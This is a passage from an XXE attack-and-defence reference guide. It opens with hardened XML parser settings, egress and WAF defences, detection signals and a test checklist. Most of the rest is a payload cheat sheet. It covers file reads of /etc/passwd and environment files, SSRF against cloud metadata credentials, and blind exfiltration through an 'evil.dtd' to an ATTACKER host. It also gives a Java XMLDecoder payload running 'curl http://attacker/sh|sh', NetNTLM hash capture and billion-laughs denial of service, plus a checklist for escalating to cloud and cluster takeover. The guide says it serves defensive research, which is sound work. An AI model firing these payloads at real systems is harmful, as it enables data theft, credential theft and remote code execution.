dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
.NET ≥ 4.5.2:
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null
};
using var reader = XmlReader.Create(stream, settings);
Python:
from defusedxml import ElementTree as ET # blocks DTD by default
root = ET.fromstring(xml_bytes)
or native lxml:
parser = lxml.etree.XMLParser(
resolve_entities=False,
no_network=True,
load_dtd=False,
dtd_validation=False,
huge_tree=False,
)
PHP (modern):
$doc = new DOMDocument();
$doc->loadXML($xml); // safe in PHP 8+ — DOCTYPE disabled by default
Avoid LIBXML_NOENT and LIBXML_DTDLOAD unless absolutely required.
Ruby / Nokogiri:
Nokogiri::XML(input) # safe defaults; do not add .noent or .dtdload
16.3 Network & runtime defences#
- Egress-filter the app server: block outbound
file://is implicit, block169.254.169.254, block arbitrary outbound HTTP from parser contexts. - IMDSv2 (AWS) — force
HttpTokens=required. - Container egress: default-deny, allowlist specific hostnames only.
- WAF rules that block
<!DOCTYPE/<!ENTITYon non-XML endpoints and strip them on XML endpoints that don’t need DTD. - Suppress detailed parser errors in production responses (kills error-based variants).
- Sandbox file-format processors (ImageMagick policy.xml, LibreOffice profile, SVG rasterisers) in containers without filesystem/network access.
16.4 Logging / detection signals#
- XML parser error logs mentioning
external entity,SYSTEM,DOCTYPE. - Outbound DNS/HTTP from application servers to unknown domains.
- Requests that include
<!DOCTYPEon endpoints that historically received pure-data XML. - Access to
/proc/self/environ,/etc/passwd,/root/.ssh/by parser processes. - Sudden spikes in heap / CPU — possible billion-laughs.
16.5 Test checklist#
- Send
<!DOCTYPE r [<!ENTITY x "test">]><r>&x;</r>— doestestappear? Entities enabled. - Send OOB probe with Collaborator — do callbacks land? External resolution enabled.
- Send parameter-entity probe — does the remote DTD get fetched? PE expansion enabled.
- Send classic file read — is content reflected?
- Send FTP/HTTP exfil via remote DTD — captures data?
- Send error payload with bad path — does response include filename fragment?
- Send
jar://probe (Java) — does temp file appear? - Send billion-laughs with low iteration — does the service degrade? Back off if yes.
- File-format wrappers — SVG avatar, DOCX upload, SAML metadata, RSS feed import.
- JSON→XML swap on every JSON endpoint that returns data.
17. Payload Quick Reference#
17.1 Detection probes#
<!-- Local entity round-trip -->
<!DOCTYPE r [<!ENTITY t "entity-works">]><r>&t;</r>
<!-- OOB via general entity -->
<!DOCTYPE r [<!ENTITY p SYSTEM "http://COLLAB/g">]><r>&p;</r>
<!-- OOB via parameter entity (catches stricter parsers) -->
<!DOCTYPE r [<!ENTITY % p SYSTEM "http://COLLAB/p"> %p;]><r/>
17.2 File read#
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///c:/windows/win.ini">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///proc/self/environ">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "netdoc:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "jar:file:///tmp/a.jar!/b.txt">]><r>&x;</r>
17.3 SSRF#
<!DOCTYPE r [<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://127.0.0.1:6379/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://[::1]/">]><r>&x;</r>
17.4 Blind OOB external DTD#
Victim:
<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://ATTACKER/evil.dtd"> %dtd;]><r/>
evil.dtd (HTTP channel):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % wrap "<!ENTITY % exfil SYSTEM 'http://ATTACKER/?x=%file;'>">
%wrap;
%exfil;
evil.dtd (FTP channel for multiline files):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrap "<!ENTITY % exfil SYSTEM 'ftp://a:%file;@ATTACKER/'>">
%wrap;
%exfil;
17.5 Error-based (external DTD)#
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % err SYSTEM 'file:///nope/%file;'>">
%eval;
%err;
17.6 Error-based (local DTD — GNOME yelp)#
<!DOCTYPE r [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; err SYSTEM 'file:///nope/%file;'>">
%eval;
%err;
'>
%local_dtd;
]>
<r/>
17.7 lxml meow:// bypass#
<!DOCTYPE r [
<!ENTITY % a '
<!ENTITY % file SYSTEM "file:///tmp/flag.txt">
<!ENTITY % b "<!ENTITY c SYSTEM 'meow://%file;'>">
'>
%a; %b;
]>
<r>&c;</r>
17.8 XInclude#
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
17.9 SVG upload#
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="40">
<text y="20">&x;</text>
</svg>
17.10 SOAP#
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<payload><![CDATA[<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>]]></payload>
</soap:Body>
</soap:Envelope>
17.11 PHP RCE via expect#
<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]><r>&x;</r>
17.12 Java XMLDecoder RCE#
<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>curl http://attacker/sh|sh</string></void>
</array>
<void method="start"/>
</object>
</java>
17.13 Windows NetNTLMv2 capture#
<!DOCTYPE r [<!ENTITY x SYSTEM "file:////ATTACKER-IP/share/a.jpg">]><r>&x;</r>
17.14 Billion laughs#
<!DOCTYPE lolz [
<!ENTITY a0 "lol">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<lolz>&a4;</lolz>
17.15 UTF-7 encoded DOCTYPE#
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
Appendix A — High-value local DTDs#
| OS / Package | Path | Overridable entity |
|---|---|---|
| GNOME yelp | /usr/share/yelp/dtd/docbookx.dtd | ISOamso, ISOnum |
| fontconfig | /usr/share/xml/fontconfig/fonts.dtd | constant |
| Xalan (Java) | xalan2.jar!/org/apache/xalan/res/XSLTInfo.properties | various |
| IBM WebSphere | $WAS/properties/schemas/j2ee/XMLSchema.dtd | WebSphere-specific |
| Microsoft | C:\Windows\System32\wbem\xml\cim20.dtd | SuperClassName |
| Red Hat / CentOS | /usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd | — |
| Tomcat | jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd | — |
Full list: https://github.com/GoSecure/dtd-finder/tree/master/list
Appendix B — Fingerprinting checklist before escalating#
- Does the target reflect XML? → test in-band file read.
- Does the parser fetch remote DTDs? → OOB exfil.
- Does it return parser errors? → error-based.
- Egress-filtered? → local-DTD error-based.
- Java fingerprint (Server header, cookie, error trace)? →
jar:,netdoc:, XMLDecoder, XSLT RCE. - PHP fingerprint? →
php://filter,expect://. - .NET fingerprint? → check
XmlResolver/DtdProcessingcode patterns; pre-4.5.2 is default-vulnerable. - File-upload feature? → SVG / DOCX / XLSX / SAML / RSS wrapper.
- Windows host? → SMB NetNTLM hash capture.
- Is the XML in a privileged context (root, cloud IAM, K8s service account)? → pivot to secrets, cloud creds, cluster takeover.
References#
Key source articles (from raw/XXE/):
- HackTricks — XXE / XEE / XML External Entity (definitive cheat sheet).
- GoSecure — Advanced XXE Exploitation workshop.
- PortSwigger — Blind XXE labs and writeups.
- PVS-Studio — XXE in C# applications (parser defaults, BlogEngine.NET case).
- OWASP — XML External Entity Prevention Cheat Sheet.
- Detectify Labs — Obscure XXE attacks (Office Open XML).
- honoki.net — From blind XXE to root-level file read.
- Horizon3.ai — From support ticket to zero day (Xerox FreeFlow Core JMF XXE → SSRF → RCE).
- OffSec — CVE-2025-27136 LocalS3 XXE.
- pwn.vg — Local file read via error-based XXE (XLIFF).
- YesWeHack — Bug bounty XXE guide + Dojo CTF #42 write-up.
- HackerOne / Bugcrowd — XXE complete guide.
- HLOverflow — XXE-study apps (PHP vulnerable server source).
- enjoiz — XXEinjector (Ruby automation).
- luisfontes19 — xxexploiter (TS payload + server).
- BuffaloWill — oxml_xxe (file-format wrapper generator).
- GoSecure — dtd-finder (local-DTD discovery).
- Swarm / PT Security — Impossible XXE in PHP (WrapWrap / Lightyear bypass).
- Cisco / Akamai / Apache / Grav — vendor advisories for real CVEs referenced above.
Compiled for defensive security research, variant hunting, and secure-code review reference.